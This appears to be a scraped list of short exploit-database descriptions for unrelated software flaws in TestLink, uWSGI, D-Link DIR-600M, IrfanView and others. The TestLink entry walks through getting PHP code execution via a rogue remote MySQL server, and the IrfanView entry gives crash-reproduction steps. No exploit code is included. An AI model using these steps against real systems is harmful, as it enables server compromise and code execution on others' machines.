Testlink (Version Below 1.9.17) is vulnerable to Remote Code Execution. Vulnerable code is in file 'install/installNewDB.php'. Testlink allows user to re-install it and when user visits '/install/' directory and reachs to 'Database detail' page i.e 'install/installNewDB.php', user can specifiy PHP code in 'TestLink DB login' field. After successful installation, PHP code will get save in config file. During installation process, script first try to connect MySQL 'root' user account (supplied by user during installation phase), if script is able to connect to MySQL server (locally or remotly hosted), process of CMS installation goes further. Script save MySQL server host, username and password in config file. Here attacker can take advantage of this process to write PHP code in config file. To do this, attacker need to setup MySQL server on a machine and MySQL server must be configure to accept connection from remote IP (which can be done easily by changing parameter in my.cnf file). To configure MySQL server open to remote connection, just open my.cnf file and comment out skip-networking as well as bind-address (if any present in my.cnf )i.e change line 'skip-networking' to '# skip-networking' and 'bind-address = some_ip' to '#bind-address = some_ip' save the my.cnf file. reload/restart MySQL server and your mysql server will accept remote connection from any remote IP Now, you need to configure MySQL root user in such way so that when remote script try to connect to MySQL server root user, it allows remote script. When attacker provide credentials of a Remote MySQL server which is attacker controlled and listening for remote connection, attacker just need to specifiy PHP code in 'TestLink DB login' field.
This exploit is a proof-of-concept code for a buffer overflow vulnerability in iSumsoft ZIP Password Refixer Version 3.1.1. The vulnerability is caused due to a boundary error when handling user-supplied data, which can be exploited to cause a stack-based buffer overflow by sending a specially crafted string to the vulnerable application. This may allow an attacker to execute arbitrary code.
The uWSGI PHP plugin before 2.0.17 is vulnerable to Directory Traversal when used without specifying the "php-allowed-docroot" option. The vulnerability exists due to improper validation of the file path when requesting a resource under the DOCUMENT_ROOT directory which is specified via "php-docroot". A remote attacker could exploit this weakness to read arbitrary files from the vulnerable system using path traversal sequences ("..%2f").
Remote unauthenticated attackers can crash the "Proxy.exe" Server component of Dualdesk application which listens on TCP Port 5500 by sending a long string of junk chars.
SEGGER embOS/IP FTP Server 3.22 allows remote attackers to cause a denial of service (daemon crash) via an invalid LIST, STOR, or RETR command.
A persistent cross-site scripting vulnerability exists in D-Link DIR-600M Wireless routers with firmware version 3.01. An attacker can inject malicious JavaScript code into the router's web interface by creating a user with a specially crafted name. The code will be executed when the router's web interface is accessed by an authenticated user.
IrfanView 4.50 Email PlugIn is vulnerable to a local buffer overflow vulnerability when a maliciously crafted file is opened. This can be exploited to execute arbitrary code by corrupting the SEH chain and overwriting the return address with a pointer to the shellcode.
A local buffer overflow vulnerability exists in IrfanView 4.44 Email PlugIn. An attacker can exploit this vulnerability by generating a malicious irfan.txt file, copying its contents to clipboard, opening IrfanView and a sample image from My Pictures, selecting Options, Send by Email, Settings, pasting contents from clipboard into Full Name and selecting OK, which will cause the application to crash and pop calc.
Routers2 is vulnerable to Reflected Cross-Site Scripting, affecting the 'rtr' GET parameter in a page=graph action to `cgi-bin/routers2.pl`.
This exploit supports 5.01 (maybe others)! It is based on CVE-2017-7005, PegaSwitch and 4.0x exploit by qwertyoruiopz. It requires the latest version of node from nodejs.org and running npm install and npm start.
Services By CQR